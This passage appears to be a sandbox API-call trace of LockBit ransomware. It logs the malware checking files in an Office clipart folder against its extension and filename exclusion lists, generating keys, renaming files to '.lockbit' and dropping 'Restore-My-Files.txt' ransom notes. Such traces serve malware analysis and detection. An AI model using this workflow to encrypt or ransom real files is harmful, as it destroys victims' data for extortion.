(lpString1="bootsect.bak", lpString2="SO00505_.WMF") returned -1 [0175.541] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00505_.WMF") returned -1 [0175.541] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00505_.WMF") returned 1 [0175.541] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00505_.WMF") returned -1 [0175.541] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.541] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00505_.WMF") returned=".WMF" [0175.541] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.541] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.541] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.541] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.541] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.541] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.541] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.541] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.541] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.541] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.542] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.542] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.542] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.542] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.542] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.542] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.542] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.542] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.542] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.542] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.542] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.542] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.542] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.542] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.542] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.542] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.542] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.542] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.542] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00505_.WMF.lockbit") returned 72 [0175.542] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00505_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00505_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.543] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.543] malloc (_Size=0x40068) returned 0x3df0008 [0175.543] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2724) returned 1 [0175.543] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.544] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.544] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.545] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.545] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.547] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00505_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00505_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.547] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.547] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.548] free (_Block=0x1fa2ed8) [0175.548] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00505_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.548] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.548] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.548] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x765bc800, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x6d3324f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x765bc800, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x1724, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00513_.WMF", cAlternateFileName="")) returned 1 [0175.548] lstrcmpiW (lpString1=".", lpString2="SO00513_.WMF") returned -1 [0175.548] lstrcmpiW (lpString1="..", lpString2="SO00513_.WMF") returned -1 [0175.548] PathFindExtensionW (pszPath="SO00513_.WMF") returned=".WMF" [0175.548] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.548] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.548] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.549] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.550] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.550] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.550] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.550] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.550] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.550] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.550] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.550] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.550] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.550] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.550] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.550] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.550] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.550] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.550] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.550] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.550] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.550] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.550] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.550] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.550] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00513_.WMF") returned -1 [0175.550] lstrcmpiW (lpString1="ntldr", lpString2="SO00513_.WMF") returned -1 [0175.550] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00513_.WMF") returned -1 [0175.550] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00513_.WMF") returned -1 [0175.551] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00513_.WMF") returned -1 [0175.551] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00513_.WMF") returned 1 [0175.551] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00513_.WMF") returned -1 [0175.551] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.551] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00513_.WMF") returned=".WMF" [0175.551] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.551] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.551] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.551] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.551] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.551] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.551] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.551] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.551] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.551] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.551] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.551] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.551] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.551] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.551] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.551] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.551] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.551] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.551] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.552] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.552] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.552] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.552] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.552] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.552] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.552] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.552] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.552] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.552] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00513_.WMF.lockbit") returned 72 [0175.552] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00513_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00513_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0175.553] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.553] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.553] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5924) returned 1 [0175.553] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.554] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.554] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.554] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.554] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.554] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.554] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.559] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00513_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00513_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.560] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.560] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.561] free (_Block=0x1fa2ed8) [0175.561] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00513_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.561] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.561] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.561] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa18b10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2602, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00555_.WMF", cAlternateFileName="")) returned 1 [0175.561] lstrcmpiW (lpString1=".", lpString2="SO00555_.WMF") returned -1 [0175.561] lstrcmpiW (lpString1="..", lpString2="SO00555_.WMF") returned -1 [0175.561] PathFindExtensionW (pszPath="SO00555_.WMF") returned=".WMF" [0175.561] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.561] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.561] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.561] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.561] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.561] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.561] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.562] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.562] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.563] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.563] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.563] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.563] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.563] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.563] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.563] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.563] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.563] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.563] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.563] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.563] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.563] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00555_.WMF") returned -1 [0175.563] lstrcmpiW (lpString1="ntldr", lpString2="SO00555_.WMF") returned -1 [0175.563] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00555_.WMF") returned -1 [0175.563] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00555_.WMF") returned -1 [0175.563] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00555_.WMF") returned -1 [0175.563] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00555_.WMF") returned 1 [0175.563] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00555_.WMF") returned -1 [0175.563] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.563] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00555_.WMF") returned=".WMF" [0175.563] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.563] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.563] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.564] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.565] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00555_.WMF.lockbit") returned 72 [0175.565] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00555_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00555_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0175.570] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.570] malloc (_Size=0x40068) returned 0x3df0008 [0175.570] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9730) returned 1 [0175.570] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.570] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.571] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.571] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.571] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.572] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00555_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00555_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.572] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.572] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.574] free (_Block=0x1fa2ed8) [0175.574] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00555_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.574] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.574] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.574] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23879c00, ftCreationTime.dwHighDateTime=0x1c01c5d, ftLastAccessTime.dwLowDateTime=0x5aa18b10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x23879c00, ftLastWriteTime.dwHighDateTime=0x1c01c5d, nFileSizeHigh=0x0, 